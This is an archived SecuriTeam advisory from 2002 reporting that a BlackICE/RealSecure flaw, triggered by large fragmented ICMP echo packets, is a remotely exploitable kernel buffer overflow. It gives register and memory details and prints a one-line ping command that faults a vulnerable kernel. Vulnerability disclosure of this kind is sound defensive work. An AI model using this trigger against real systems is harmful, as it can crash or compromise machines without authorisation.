[NT] ISS BlackICE Exploitable Kernel Overflow
From: support@securiteam.comDate: 02/09/02
- Previous message: support@securiteam.com: "[NEWS] Cisco CatOS Telnet Buffer Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sat, 9 Feb 2002 13:51:09 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
ISS BlackICE Exploitable Kernel Overflow
------------------------------------------------------------------------
SUMMARY
The following is a follow-up on our recent post:
<http://www.securiteam.com/windowsntfocus/5KP011P6AY.html> Remote Denial
of Service Vulnerability in BlackICE Products. Further research by eEye
Digital Security on the subject revealed that this vulnerability is more
than just a DoS attack, but rather categorized as a Buffer Overflow, that
is remote exploitable and allows execution of arbitrary code.
DETAILS
Vulnerable systems:
* BlackICE Defender 2.9
* BlackICE Defender for Server 2.9
* BlackICE Agent for Workstation 3.0 and 3.1
* BlackICE Agent for Server 3.0 and 3.1
* RealSecure Server Sensor 6.0.1 and 6.5
A few days ago <mailto:quisit@quest.net> Matt Taylor posted to several
security mailing lists stating that BlackICE was vulnerable to a Denial of
Service attack that could result in the BlackICE service crashing and or
blue screens of the remote system. There was various talk on mailing lists
about the "Denial of Service" attack and what other versions it affected.
The day after Matt posted his DoS attack against BlackICE to various
mailing lists, ISS (Makers of BlackICE) then posted their security
advisory to notify clients of the new vulnerability and a work around
until a patch is released. ISS's advisory also described the vulnerability
as a denial of service attack.
As of yet we have not seen anyone produce accurate technical information
about the "Denial of Service" vulnerability. However, Ryan Permeh and
Riley Hassell from eEye Digital Security conducted research recently that
shows the BlackICE "Denial of Service" vulnerability is in fact an
exploitable buffer overflow, therefore allowing anyone to remotely
compromise users of BlackICE and potentially RealSecure Server Sensor.
The research was done against BlackICE Defender 2.9 with a blackice.exe of
3.1.10. eEye are not sure if the other variants of BlackICE or RealSecure
are also exploitable. However, since they are all vulnerable to the same
"denial of service" attack it can be assumed that they are also
exploitable.
The BlackICE buffer overflow exposes a significant flaw that will allow an
attacker to execute code within the kernel context. eEye's testing has
shown that by sending only a handful of large ICMP echo request packets
(16 60k packets, although it looks like packet size is not important as
long as it fragments), we get the kernel to return directly into our ICMP
payload. eEye's testing has shown that we have a significant amount of
space to work with in our payload, allowing a large number of exploit
scenarios. This can include but not limited to, Trojaning the NT kernel.
The code is executed within 0xF5XXXXXX, meaning that we are clearly within
kernel memory space at this point. We have a pointer to more of our code
within EBX (roughly 60,000 bytes of potential shellcode), and several
bytes of potential jumpable code after our code shifts.
Example:
To cause the kernel to fault using an interrupt 3 (0xCC, or hard break on
Intel hardware), issue the following command against a BlackICE protected
server from a Linux machine.
ping -s 60000 -c 16 -p CC 1.1.1.1
eEye have verified operations on win2k server and professional, and are
currently finishing a pure kmode exploit to allow an attacker to
manipulate the kernel and execute arbitrary code within the kernel
context. eEye will not be publishing this exploit. This alert contains
enough technical details within it to show that indeed we are overflowing
and hitting our interrupt 0xCC, which shows were able to jump and execute
our code of choice.
So once again, it is not simply a denial of service attack. If you are
running a vulnerable version of BlackICE then you are vulnerable to a
remote kernel level compromise in which remote attacks can execute
arbitrary code.
Vendor status:
ISS has released a patch for this buffer overflow vulnerability. You can
find out more information about the patch from here:
<http://www.iss.net/support/consumer/BI_downloads.php>
http://www.iss.net/support/consumer/BI_downloads.php
ADDITIONAL INFORMATION
The information has been provided by <mailto:quisit@quest.net> Matt
Taylor, and by Ryan Permeh and Riley Hassell from <http://www.eEye.com>
eEye Digital Security.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Cisco CatOS Telnet Buffer Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
